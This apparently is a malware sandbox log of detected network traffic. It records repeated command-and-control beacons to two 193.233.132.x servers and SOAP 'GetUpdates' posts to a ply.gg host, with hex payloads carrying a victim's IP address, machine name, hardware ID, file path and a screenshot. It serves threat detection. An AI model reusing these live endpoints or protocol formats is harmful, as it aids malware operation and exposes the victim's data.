Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 95714Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 95713Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 95714Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-AliveData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 75 73 65 72 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 43 69 74 79 3e 55 4e 4b 4e 4f 57 4e 3c 2f 61 3a 43 69 74 79 3e 3c 61 3a 43 6f 75 6e 74 72 79 3e 55 53 3c 2f 61 3a 43 6f 75 6e 74 72 79 3e 3c 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 31 30 30 30 31 38 38 30 30 31 5c 62 75 69 6c 64 31 32 2e 65 78 65 3c 2f 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 3c 61 3a 48 61 72 64 77 61 72 65 3e 39 46 31 39 36 42 34 39 37 42 44 46 44 30 43 45 44 38 33 32 44 34 41 42 38 41 41 43 33 42 34 46 3c 2f 61 3a 48 61 72 64 77 61 72 65 3e 3c 61 3a 49 50 76 34 3e 38 31 2e 31 38 31 2e 35 37 2e 35 32 3c 2f 61 3a 49 50 76 34 3e 3c 61 3a 4c 61 6e 67 75 61 67 65 3e 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 3c 2f 61 3a 4c 61 6e 67 75 61 67 65 3e 3c 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 61 6c 66 6f 6e 73 3c 2f 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 3c 61 3a 4d 6f 6e 69 74 6f 72 3e 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 42 51 41 41 41 41 51 41 43 41 59 41 41 41 43 2b 6b 2f 52 44 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 41 52 6e 51 55 31 42 41 41 43 78 6a 77 76 38 59 51 55 41 41 41 41 4a 63 45 68 5a 63 77 41 41 44 73 4d 41 41 41 37 44 41 63 64 76 71 47 51 41 41 4b 4e 63 53 55 52 42 56 48 68 65 37 50 31 2f 65 42 7a 33 66 65 42 35 37 68 39 33 74 33 76 6e 5a 35 37 64 6d 39 76 62 33 64 6c 6e 62 37 6d 36 33 5a 32 39 33 4d 37 74 62 76 59 77 73 35 37 6c 2f 76 41 6f 48 74 73 38 61 31 65 30 4d 78 6b 34 6b 59 53 4d 6e 46 43 32 4d 34 77 63 6d 35 62 74 51 46 46 69 4a 4a 62 43 53 4c 49 74 78 54 4b 63 52 4d 4c 45 69 65 69 78 45 6c 69 79 41 74 6b 5a 67 34 6b 74 57 42 61 44 53 45 34 67 55 68 59 6b 57 59 52 2b 67 70 5a 6f 79 42 51 46 6b 52 4c 42 58 2f 70 63 66 61 75 71 67 65 35 47 6f 51 43 51 41 49 6c 75 76 74 37 50 38 35 6f 49 36 4f 37 71 71 75 71 47 35 50 70 4d 56 66 65 2f 46 5a 49 6b 53 5a 49 6b 53 5a 4b 36 4e 67 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 95713Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-AliveData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 75 73 65 72 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 43 69 74 79 3e 55 4e 4b 4e 4f 57 4e 3c 2f 61 3a 43 69 74 79 3e 3c 61 3a 43 6f 75 6e 74 72 79 3e 55 53 3c 2f 61 3a 43 6f 75 6e 74 72 79 3e 3c 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 31 30 30 30 31 38 37 30 30 31 5c 62 75 69 6c 64 31 32 2e 65 78 65 3c 2f 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 3c 61 3a 48 61 72 64 77 61 72 65 3e 39 46 31 39 36 42 34 39 37 42 44 46 44 30 43 45 44 38 33 32 44 34 41 42 38 41 41 43 33 42 34 46 3c 2f 61 3a 48 61 72 64 77 61 72 65 3e 3c 61 3a 49 50 76 34 3e 38 31 2e 31 38 31 2e 35 37 2e 35 32 3c 2f 61 3a 49 50 76 34 3e 3c 61 3a 4c 61 6e 67 75 61 67 65 3e 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 3c 2f 61 3a 4c 61 6e 67 75 61 67 65 3e 3c 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 61 6c 66 6f 6e 73 3c 2f 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 3c 61 3a 4d 6f 6e 69 74 6f 72 3e 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 42 51 41 41 41 41 51 41 43 41 59 41 41 41 43 2b 6b 2f 52 44 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 41 52 6e 51 55 31 42 41 41 43 78 6a 77 76 38 59 51 55 41 41 41 41 4a 63 45 68 5a 63 77 41 41 44 73 4d 41 41 41 37 44 41 63 64 76 71 47 51 41 41 4b 4e 63 53 55 52 42 56 48 68 65 37 50 31 2f 65 42 7a 33 66 65 42 35 37 68 39 33 74 33 76 6e 5a 35 37 64 6d 39 76 62 33 64 6c 6e 62 37 6d 36 33 5a 32 39 33 4d 37 74 62 76 59 77 73 35 37 6c 2f 76 41 6f 48 74 73 38 61 31 65 30 4d 78 6b 34 6b 59 53 4d 6e 46 43 32 4d 34 77 63 6d 35 62 74 51 46 46 69 4a 4a 62 43 53 4c 49 74 78 54 4b 63 52 4d 4c 45 69 65 69 78 45 6c 69 79 41 74 6b 5a 67 34 6b 74 57 42 61 44 53 45 34 67 55 68 59 6b 57 59 52 2b 67 70 5a 6f 79 42 51 46 6b 52 4c 42 58 2f 70 63 66 61 75 71 67 65 35 47 6f 51 43 51 41 49 6c 75 76 74 37 50 38 35 6f 49 36 4f 37 71 71 75 71 47 35 50 70 4d 56 66 65 2f 46 5a 49 6b 53 5a 49 6b 53 5a 4b 36 4e 67 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
